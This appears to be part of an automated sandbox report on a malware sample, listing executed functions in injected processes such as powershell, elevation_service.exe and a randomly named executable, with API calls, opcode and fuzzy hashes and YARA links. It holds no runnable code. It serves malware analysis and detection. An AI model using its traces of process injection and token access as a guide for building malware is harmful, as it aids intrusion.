Opcode Fuzzy Hash: 062f8acec5d016b38ad160b494a24a7a59e64832de7fa6fd064560e0fa597083
Instruction Fuzzy Hash: B72138B170420AABDB345A7AA800B27FBDBAFC0711F25843AAA47CF385DD75C8558361

Function 07DF22E8 Relevance: 5.1, Strings: 4, Instructions: 89COMMON

Download Yara Rule

Strings

J&l, xrefs: 07DF237F
J&l, xrefs: 07DF23C5
pij, xrefs: 07DF23A0
pij, xrefs: 07DF2363

Memory Dump Source

Source File: 00000016.00000002.1857483821.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7df0000_powershell.jbxd

Similarity

API ID:
String ID: pij$pij$J&l$J&l
API String ID: 0-1627512543
Opcode ID: 0dda98cca6a85d8f78cf1771b59322b13e67a61661c3ee6cef70c3dd58b52120
Instruction ID: 2b186994baaa1c80a23e20eeaf6939c4c3b1daa314f33c748a14f6528eb867cf
Opcode Fuzzy Hash: 0dda98cca6a85d8f78cf1771b59322b13e67a61661c3ee6cef70c3dd58b52120
Instruction Fuzzy Hash: DA31B3F190430AEFDB20DF55C5416AEFBF0BB51310F0A806ADA988B251C775F985CBA2

Function 07DF2108 Relevance: 5.1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

Strings

J&l, xrefs: 07DF214A
$^q, xrefs: 07DF2166
J&l, xrefs: 07DF2156
$^q, xrefs: 07DF2172

Memory Dump Source

Source File: 00000016.00000002.1857483821.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7df0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$J&l$J&l
API String ID: 0-3689461234
Opcode ID: 325488d5cca68d5b2a3ee44da3484212784ea754359a05b1eb33dc8c533fc3bc
Instruction ID: 4e73a3ef7a6debad684e2023a6fbdc728c9840b8d9306c7a6d209d7052a485b8
Opcode Fuzzy Hash: 325488d5cca68d5b2a3ee44da3484212784ea754359a05b1eb33dc8c533fc3bc
Instruction Fuzzy Hash: 3E1108B26087454FC332522C9C2055BEFA67FD2710B1A85A7D684DF67ACA349C89C3B6

Function 07DF0308 Relevance: 5.0, Strings: 4, Instructions: 46COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07DF0373
4'^q, xrefs: 07DF037F
$^q, xrefs: 07DF035E
$^q, xrefs: 07DF0352

Memory Dump Source

Source File: 00000016.00000002.1857483821.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7df0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: f4a5f81e6f364ae2b57ad13b9e1fd47adb37dfb2065db42eceae8a39c5ffad82
Instruction ID: 06465005ef6f5501364d0f017cc291f811332bfd56bf3f3939a34aede635a1f8
Opcode Fuzzy Hash: f4a5f81e6f364ae2b57ad13b9e1fd47adb37dfb2065db42eceae8a39c5ffad82
Instruction Fuzzy Hash: 62012B6170C3864FC72A17381820216EFF26F82A60B1A8597C580CF39BDE158C498393

Analysis Process: elevation_service.exePID: 7828, Parent PID: 620COMMON

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	98%
Signature Coverage:	0%
Total number of Nodes:	98
Total number of Limit Nodes:	7

Executed Functions

Function 008952A0 Relevance: 1.6, APIs: 1, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDefaultLangID.KERNELBASE ref: 008953C4

Memory Dump Source

Source File: 0000001A.00000002.2947957447.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_890000_elevation_service.jbxd

Similarity

API ID: DefaultLangSystem
String ID:
API String ID: 706401283-0
Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
Instruction ID: 2a6c15edf7c8c9812c0b5dac075b320166582ad0e518f84b31c7f152f2ccffc6
Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
Instruction Fuzzy Hash: B441E59150DE998FDF27736448642707BA0FB233E6F9D04D7D487CB2E2E1984C81A76A

Function 008B0080 Relevance: 5.0, APIs: 3, Instructions: 466
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameW.KERNEL32 ref: 008B03E0

Memory Dump Source

Source File: 0000001A.00000002.2947957447.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_890000_elevation_service.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
Instruction ID: 10862f6c7573f2bb94b889e2e11751930e7895474883e20c8d50b6159cd23d34
Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
Instruction Fuzzy Hash: E5D1F231418F0D8BCB28EF58D8497EBB7E1FBA0314F18461FD846C7265DA74DA498AC2

Function 00898070 Relevance: 4.7, APIs: 3, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001A.00000002.2947957447.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_890000_elevation_service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
Instruction ID: 50381fc56232b9b84b3b167dc1d46417445747ac318a92d7b92f80656cb7360f
Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
Instruction Fuzzy Hash: 2A61FF3160CE4BDFCF65BB6888186357AA0FB57354F6C025AE447C32A1DF349C499752

Function 00895910 Relevance: 1.9, APIs: 1, Instructions: 607
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001A.00000002.2947957447.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_890000_elevation_service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
Instruction ID: 4e0866edc23fb9f6775eb0b4f66c61101d2e65ceca0e8b619865e3fba4522355
Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
Instruction Fuzzy Hash: 41F14A2071CE4C8FDB6AA71C68553FA77D1F79A324F58019EE08BC7396DD249C068786

Function 00895B42 Relevance: 1.6, APIs: 1, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001A.00000002.2947957447.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_890000_elevation_service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
Instruction ID: 1f1fc768003e860bc5e49baf3f34d606b7aa48b54c72954de25b69e839a95820
Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
Instruction Fuzzy Hash: DE21AC3020DF498FCFABBB28C8587746AE1FB5532CF6C05A69047CF2A6CA248C449356

Function 00895B09 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001A.00000002.2947957447.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_890000_elevation_service.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
Instruction ID: bb57c58341d69bf9b7931122a7abe8f11cf541355909bfcae94595946a5fef62
Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
Instruction Fuzzy Hash: 6C01803010EF4E8FDFA776249C182797790FB5133CF2D01AA8487CA0D5DB644905A712

Function 00895B87 Relevance: 1.5, APIs: 1, Instructions: 23
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE ref: 00895B90
CreateThread.KERNELBASE ref: 00895CDF

Memory Dump Source

Source File: 0000001A.00000002.2947957447.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_890000_elevation_service.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
Instruction ID: 92eeed506218591947deb2788b9174a7c3b880090bf3a39faffa5ea594402def
Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
Instruction Fuzzy Hash: DBE0863060DB4C4FDF5BAB2498103193AE5FB89324F1D01CEC44AD71D1CB6909058792

Function 0089599B Relevance: 1.3, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcscpy.LIBCMT ref: 008959D9

Memory Dump Source

Source File: 0000001A.00000002.2947957447.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_890000_elevation_service.jbxd

Similarity

API ID: wcscpy
String ID:
API String ID: 1284135714-0
Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
Instruction ID: d441e254b495d976bd43622a6d819cca7cb085ff1e0e483fd6230873194a1c8b
Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
Instruction Fuzzy Hash: 8601D66060DE94CFFF17B71C60553797D92F794338F2C059AA08ACB192C9348D019746

Function 00898090 Relevance: 1.3, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 00898186

Memory Dump Source

Source File: 0000001A.00000002.2947957447.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_890000_elevation_service.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
Instruction ID: 699cca085a1703f469e3cb66463c7a2c8f8dd9bca9f549f315e11d0cb0536dac
Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
Instruction Fuzzy Hash: 2AC048A162D94BEAAE7936881C1B0B47A54F6037A9B1C048A9C06C1220EE5ACE4351AB

Function 0089817F Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 00898186

Memory Dump Source

Source File: 0000001A.00000002.2947957447.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_890000_elevation_service.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
Instruction ID: 8747528884f426cfd8f6d1bf380858714dcc45cc47751ed77b5ac06a26daf70d
Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
Instruction Fuzzy Hash: ABC092A065850BC75D3836882C0A0B17954F613760F0C4453EC06CA360DE598D4341A2

Analysis Process: maintenanceservice.exePID: 8112, Parent PID: 620COMMON

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	97.5%
Signature Coverage:	0%
Total number of Nodes:	81
Total number of Limit Nodes:	6

Executed Functions

Function 00CD52A0 Relevance: 1.6, APIs: 1, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDefaultLangID.KERNELBASE ref: 00CD53C4

Memory Dump Source

Source File: 0000001B.00000002.1842395380.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_cd0000_maintenanceservice.jbxd

Similarity

API ID: DefaultLangSystem
String ID:
API String ID: 706401283-0
Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
Instruction ID: a1710b2ed5386c05852ea9c7e8ae72828403fdd03fcbc91fccc6e0878259c622
Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
Instruction Fuzzy Hash: 984128A180DE958FD72A422948643717BD09B223E2F9D04D7D3E3CB3F6D2984D859727

Function 00CF0080 Relevance: 5.0, APIs: 3, Instructions: 466
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameW.KERNEL32 ref: 00CF03E0

Memory Dump Source

Source File: 0000001B.00000002.1842395380.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_cd0000_maintenanceservice.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
Instruction ID: de7ae2bea8f0cd1f3d677937731973d3fdc963722b5b2005cf6e84b8bb98d6e8
Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
Instruction Fuzzy Hash: 94D13531418B0D8BC7A8EF58C8457FAB7D1FBA0710F28461FDA56C7166DA749A44C6C3

Function 00CD8070 Relevance: 4.7, APIs: 3, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001B.00000002.1842395380.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_cd0000_maintenanceservice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
Instruction ID: 6ca86fe024f6c18844252e790da2b24cabfc4f0b2cc59f9f263ef4ab3ca4886f
Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
Instruction Fuzzy Hash: 8C61667050CA459FC7699B29885433EBBA0FB55350F58065BD72BC33A0DF24AE0E9352

Function 00CD5910 Relevance: 1.9, APIs: 1, Instructions: 607
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001B.00000002.1842395380.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_cd0000_maintenanceservice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
Instruction ID: c4d399256493cddb3be92b02f6ab4d0bf39ef011bc765b2ce97f862d48bb6f57
Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
Instruction Fuzzy Hash: 97F1242171CE4C8FC6A9A71D58513BAB3D2EB99310F68029BE25EC3396CD349D469783

Function 00CD5B42 Relevance: 1.6, APIs: 1, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001B.00000002.1842395380.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_cd0000_maintenanceservice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
Instruction ID: c20e83633843fcb0a31c162fc4cef536a8cec69b3c9000f513e85b0f070ff017
Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
Instruction Fuzzy Hash: 4121F43022CF448FCB699B1D844873576E2EBDD351F2801AB8367CF3E6CA248E449322

Function 00CD5B09 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001B.00000002.1842395380.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_cd0000_maintenanceservice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
Instruction ID: 4e88c4713c2cd36903f32c0fee0c93f3fb019d73d4d61aa20cc8d46cadabe776
Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
Instruction Fuzzy Hash: B301683011DF468FDB6547258D183397BD1EB99334F2401ABC693CA3D5DF604B00A722

Function 00CD5B87 Relevance: 1.5, APIs: 1, Instructions: 23
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE ref: 00CD5B90
CreateThread.KERNELBASE ref: 00CD5CDF

Memory Dump Source

Source File: 0000001B.00000002.1842395380.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_cd0000_maintenanceservice.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
Instruction ID: 29308cba0010ff05afc7eb91fde416d709ba18a99fdddfe3cec8188e793709ad
Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
Instruction Fuzzy Hash: 99E0863061DB444FDB599B2458107297AE5EB88314F1501CFC54ADB2D1CB790A054782

Function 00CD599B Relevance: 1.3, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcscpy.LIBCMT ref: 00CD59D9

Memory Dump Source

Source File: 0000001B.00000002.1842395380.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_cd0000_maintenanceservice.jbxd

Similarity

API ID: wcscpy
String ID:
API String ID: 1284135714-0
Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
Instruction ID: a3405fb1751612f1157b230ef9d6a781932da13e742da688a7d76786448759ab
Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
Instruction Fuzzy Hash: DD01497090DF90CFD717DB1940613796652F754330F28015BA34ECB392C9344F02A752

Function 00CD8090 Relevance: 1.3, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 00CD8186

Memory Dump Source

Source File: 0000001B.00000002.1842395380.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_cd0000_maintenanceservice.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
Instruction ID: 777a05c7c737e50f6aa2a78cc3b4d2c1d03c3fc73b8594db4e3364e53eb5af10
Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
Instruction Fuzzy Hash: 42C08C6012CC02B7523802490C0B0FC66209202790B4C00078F2A80320DD048F0F0097

Function 00CD817F Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 00CD8186

Memory Dump Source

Source File: 0000001B.00000002.1842395380.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_cd0000_maintenanceservice.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
Instruction ID: 3dc8fd7770f5edc2f34371dde0228f5563fc9f541b929d54e364e8c3a231475e
Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
Instruction Fuzzy Hash: ECC092A055C909A7513826892C0A0BD75605613BA0F0C4513EF2A8A360DD584F4F41A2

Analysis Process: zeXKjViL.exePID: 7204, Parent PID: 7272COMMON

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	96
Total number of Limit Nodes:	9

Executed Functions

Function 01088286 Relevance: 19.0, APIs: 8, Strings: 2, Instructions: 1547COMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32(00000000,00000008), ref: 0108838F
CloseHandle.KERNELBASE(00000000), ref: 0108839F

Strings

AQu, xrefs: 0109295E
, xrefs: 01087395

Memory Dump Source

Source File: 00000022.00000002.1983376643.0000000001084000.00000040.00001000.00020000.00000000.sdmp, Offset: 01084000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1084000_zeXKjViL.jbxd

Similarity

API ID: CloseHandleOpenProcessToken
String ID: $AQu
API String ID: 3879341014-1472930311
Opcode ID: 7067344d3bf986901a25e954f76ee28bf139396c4a8120b538f5080a1f4db62f
Instruction ID: b8114707ec306de4bae7e500f16462505abf2235294dbb97e91ee20f3ba9e96f
Opcode Fuzzy Hash: 7067344d3bf986901a25e954f76ee28bf139396c4a8120b538f5080a1f4db62f
Instruction Fuzzy Hash: D6B26530A0C381AFDFB7BB1C88649357FE16B42224F5E82DAD6C54F1A7D6279806D352

Function 010A8550 Relevance: 21.6, APIs: 14, Instructions: 568COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(010CA17C), ref: 010A7FD4

Memory Dump Source

Source File: 00000022.00000002.1983376643.0000000001084000.00000040.00001000.00020000.00000000.sdmp, Offset: 01084000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1084000_zeXKjViL.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 522051d62ee642a7b684c400252f708cf0c29b27df55c5c84b54ed8f841d4e93
Instruction ID: 59e337e9d021c35a12e456b850a36dbeaa5002649da64462150340ef7182d2d3
Opcode Fuzzy Hash: 522051d62ee642a7b684c400252f708cf0c29b27df55c5c84b54ed8f841d4e93
Instruction Fuzzy Hash: C2021822A483409EEBF757EC4C08B753FE86B51663FCCC6DBE7D18A0E7E16658048252

Function 010A7DF0 Relevance: 4.6, APIs: 3, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameW.KERNEL32 ref: 010A7E0F

Memory Dump Source

Source File: 00000022.00000002.1983376643.0000000001084000.00000040.00001000.00020000.00000000.sdmp, Offset: 01084000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1084000_zeXKjViL.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 314f0c626a187939f474e3669c709ea06291aadb2be75d0d7a95243de56531f6
Instruction ID: 82aa724957ad88ec457c9eae47af06d4c7a4fc094b1e6f958f9dbeae3e80046c
Opcode Fuzzy Hash: 314f0c626a187939f474e3669c709ea06291aadb2be75d0d7a95243de56531f6
Instruction Fuzzy Hash: AA21D6336493446FE6B676DD9C09BB93EB82B91710FC5C4CAFAC85A192E167240482E3

Function 01085A3B Relevance: 3.1, APIs: 2, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,010855C0,?,00000000,00000000), ref: 01085A51
RtlExitUserThread.NTDLL(00000000), ref: 01085B11

Memory Dump Source

Source File: 00000022.00000002.1983376643.0000000001084000.00000040.00001000.00020000.00000000.sdmp, Offset: 01084000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1084000_zeXKjViL.jbxd

Similarity

API ID: Thread$CreateExitUser
String ID:
API String ID: 4108186749-0
Opcode ID: 425e56990a2c6a516e945ce07f5c706bfdc4bc562f962ebc24e1b6b2dcc60b19
Instruction ID: d6f6778a23ce535ccc250c2d6d32179f886a7bce9115f3247800f897e9e588c7
Opcode Fuzzy Hash: 425e56990a2c6a516e945ce07f5c706bfdc4bc562f962ebc24e1b6b2dcc60b19
Instruction Fuzzy Hash: 89112A2454D3C24EEBA3AB6C8C2836ABFE01FA3524F1D01DAD1C08E1A3D259450D8BA3

Function 03689130 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 036891A4

Memory Dump Source

Source File: 00000022.00000002.2025883157.0000000003680000.00000040.00000800.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_3680000_zeXKjViL.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8cc859a9555a5104aac0c7a051bcb49323ae4ec357e3593164df2fd316c5d685
Instruction ID: 12c1fe909417cfc25c8f3fcc0940da7ca58df0eac3996b5dcb0550f4ebb2e29b
Opcode Fuzzy Hash: 8cc859a9555a5104aac0c7a051bcb49323ae4ec357e3593164df2fd316c5d685
Instruction Fuzzy Hash: F91138B1D002088FCB10DFAAC444AEEFBF4FF48320F14842AD459A7210C774A944CFA5

Function 01084B70 Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 01084B76

Memory Dump Source

Source File: 00000022.00000002.1983376643.0000000001084000.00000040.00001000.00020000.00000000.sdmp, Offset: 01084000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1084000_zeXKjViL.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 9ef81b3ca4733e229c29838f03a49051363783657f25cfadd12def8c05807e8f
Instruction ID: 0428198a312e831f1c4483b128788a3ae73de48c220b248e302f116cf84a4f01
Opcode Fuzzy Hash: 9ef81b3ca4733e229c29838f03a49051363783657f25cfadd12def8c05807e8f
Instruction Fuzzy Hash: 75E0202980C563D5EFF2753C890533C75C4DB10376FD802D79BE1D68D3825541804143

Function 03689308 Relevance: 1.3, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 0368936A

Memory Dump Source

Source File: 00000022.00000002.2025883157.0000000003680000.00000040.00000800.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_3680000_zeXKjViL.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 0e29ec1b94270c487f18de64edef81beae58e0aec5c1522fee7d8ed9c1454c7d
Instruction ID: 188970301df3ecce4b8057ae366d0fc2e84f43e6a1fe7a8bee5d552a9f7014d7
Opcode Fuzzy Hash: 0e29ec1b94270c487f18de64edef81beae58e0aec5c1522fee7d8ed9c1454c7d
Instruction Fuzzy Hash: FF113AB19002488FCB10DFAAC4457EEFBF4EB88324F24841AD559A7250C774A944CF95

Function 01085D20 Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000022.00000002.1983376643.0000000001084000.00000040.00001000.00020000.00000000.sdmp, Offset: 01084000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1084000_zeXKjViL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0b80c9930e4615513bedd772b6a78a72c39c6766cbcd2e22b5dff0a89162319
Instruction ID: e1b99bf5b5add962d834de133cdab2bbeac45d15f004ab8a9bc2708d8b2f10db
Opcode Fuzzy Hash: c0b80c9930e4615513bedd772b6a78a72c39c6766cbcd2e22b5dff0a89162319
Instruction Fuzzy Hash: A3E04F5290C300AAE6BB3BAC9C1EBA17EE06B02659F8D04DDAFC0961A3F6545413C512

Function 01085D50 Relevance: 1.3, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

